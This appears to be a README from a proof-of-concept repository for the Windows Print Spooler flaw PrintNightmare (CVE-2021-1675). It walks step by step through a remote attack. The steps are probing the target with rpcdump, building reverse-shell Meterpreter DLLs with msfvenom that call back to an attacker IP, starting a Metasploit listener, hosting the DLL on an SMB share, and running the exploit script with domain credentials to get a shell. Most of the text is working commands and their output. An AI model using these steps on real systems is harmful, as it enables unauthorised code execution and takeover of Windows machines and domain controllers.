来源

关联漏洞

介绍

### Explanation of the vulnerability

The Printer Spooler is a Windows service that manages print queues. It receives jobs submitted by the user, converts them to a format the printer understands, and sends them when the printer is available. It runs as a system service (spoolsv.exe) with high privileges, making it a frequent target of attacks, such as the PrintNightmare vulnerability.

### How to exploit it

When an attacker tries to exploit the print spooler remotely, to check if a host is vulnerable to the printnightmare flaw, we could use a tool called [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) which is part of the impacket package, a set of tools widely used in the pentesting environment.

```bash
❯ rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
```

To exploit this vulnerability, the distribution method for this exploit is a malicious DLL. This method, also known as "fileless" exploitation, allows us to bypass most system protections, such as antivirus software. In this attack, we will trick the print spooler service into installing a new driver from a UNC path and loading it. In our case, this is the malicious DLL, which would provide us with a reverse shell to the attacking computer. To create the malicious DLL, I will use "msfvenom" and, depending on the architecture we are on, we will integrate a Windows x64 or x86 payload into the DLL, providing the local host and local port, where we will start a listener for a callback from the DLL. You can find the IP address of your machine by typing "ifconfig." We will use the following command to create our malicious DLL.

```bash
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
```

And if in another case our architecture was 32 bytes we would use this payload

```bash
❯ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
```

As we have created our malicious DLL, next we have to start our Listener on the “Metasploit Framework” to get the ‘Meterpreter’ shell back when the DLL is executed on the system. To start the Listener follow the steps below. In the end type 'exploit -j' to start the listener in the background.

```bash
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
LHOST => 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.10.10:443
```

Now that we've started our receiver, we start our SMB server to host the malicious DLL file. Go to the system path where we saved the DLL file and enter the following command to start the SMB server. Before doing that, make sure you have "Impacket" installed on your computer. Impacket is a collection of open-source modules written in Python, and one of them is `smbserver.py`, which is the one we're going to use in this instance. To start the "smbserver.py" script and host the malicious DLL file, enter the following command in the directory where we saved it, in my case `/home/ghost/Pentesting/Printer/`.

```bash
❯ smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

Great, we're now set up to begin the exploitation process using the [CVE-2021–1675](https://github.com/DLL00P/CVE-2021-1675) proof-of-concept (POC). To do this, we provide the domain controller and user credentials with the UNC path to the malicious DLL hosted on our system.

```bash
❯ python3 CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\\\10.10.10.10\\share\\PrintMalicious_x64.dll'
[*] Connecting to ncacn_np:10.10.220.93[\\PIPE\\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL
[*] Executing \\??\\UNC\\10.10.10.10\\share\\PrintMalicious_x64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
```

After a few seconds of running the exploit script, if we go back to the listener we started in 'Metasploit' it shows that it has opened a 'Meterpreter' session so we can now interact with the victim machine using the 'Meterpreter shell'.

文件快照

 [4.0K]  /data/pocs/2810157adc623ed31607d0301bf229090d9a8ddf
├── [8.3K]  CVE-2021-1675.py
└── [5.5K]  README.md

0 directories, 2 files

备注